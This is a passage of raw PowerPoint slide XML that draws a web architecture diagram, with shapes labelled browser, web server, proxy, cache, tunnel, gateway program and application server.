            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="677" h="145">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662539" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4093810" y="4011985"/>
            <a:ext cx="809080" cy="159965"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="780" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="780" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="781" h="145">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662540" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4968329" y="3997219"/>
            <a:ext cx="1536860" cy="167945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1612" y="144"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1612" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1613" h="145">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662541" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2676136" y="4183434"/>
            <a:ext cx="228600" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>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662542" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3831431" y="4174279"/>
            <a:ext cx="55589" cy="335909"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>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662543" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4506706" y="4165164"/>
            <a:ext cx="228600" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>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662544" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5636400" y="4169860"/>
            <a:ext cx="457200" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258350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a:xfrm>
            <a:off x="228600" y="120406"/>
            <a:ext cx="8686800" cy="1085850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715781" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2166326"/>
            <a:ext cx="1055688" cy="407194"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:soli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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715782" name="Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2109175"/>
            <a:ext cx="1143000" cy="472679"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solidFill>
          <a:ln w="12573">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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715783" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143001" y="2909276"/>
            <a:ext cx="1120820"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Reply</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715784" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2209800" y="2680676"/>
            <a:ext cx="228600" cy="4000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785" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="2566376"/>
            <a:ext cx="228600" cy="4572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786" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2623526"/>
            <a:ext cx="1368747"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Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715790" name="Oval 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2185989" y="3124779"/>
            <a:ext cx="788987" cy="351234"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Tunnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715791" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2794975"/>
            <a:ext cx="685800" cy="415529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12361"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="595959"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="808080"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gra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Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715792" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3252176"/>
            <a:ext cx="990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793" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2966426"/>
            <a:ext cx="1368747"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Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715794" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3200400" y="3423626"/>
            <a:ext cx="990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795" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3480776"/>
            <a:ext cx="1261884"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Cached Reply</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715796" name="Oval 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267201" y="3137876"/>
            <a:ext cx="735013" cy="311944"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:soli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Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715797" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5181600" y="2909276"/>
            <a:ext cx="533400" cy="2857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798" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="3080726"/>
            <a:ext cx="533400" cy="2857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801" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373139" y="2687025"/>
            <a:ext cx="1046172" cy="499502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="83598" tIns="41799" rIns="83598" bIns="41799">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="96000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="657225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715802" name="Oval 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="2109175"/>
            <a:ext cx="1143000" cy="472679"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC45D"/>
          </a:solidFill>
          <a:ln w="12573">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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715804" name="Oval 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="1537675"/>
            <a:ext cx="1143000" cy="472679"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12573">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Gateway</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715805" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="1709126"/>
            <a:ext cx="838200" cy="3429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806" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6629400" y="1880576"/>
            <a:ext cx="685800" cy="2857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807" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934201" y="1462209"/>
            <a:ext cx="1721420" cy="523220"/>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Application-specific </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715808" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5562600" y="1766276"/>
            <a:ext cx="0" cy="5143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809" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1823426"/>
            <a:ext cx="0" cy="4572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810" name="Oval 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="1594825"/>
            <a:ext cx="914400" cy="472679"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC45D"/>
          </a:solidFill>
          <a:ln w="12573">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Application-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Specific </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Extension</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715811" name="AutoShape 35"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2711450" y="1344795"/>
            <a:ext cx="1098550" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15449"/>
              <a:gd name="adj2" fmla="val -6935"/>
              <a:gd name="adj3" fmla="val 72745"/>
              <a:gd name="adj4" fmla="val -40606"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>JavaScript,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715812" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="1366225"/>
            <a:ext cx="1250950" cy="523220"/>
          </a:xfrm>
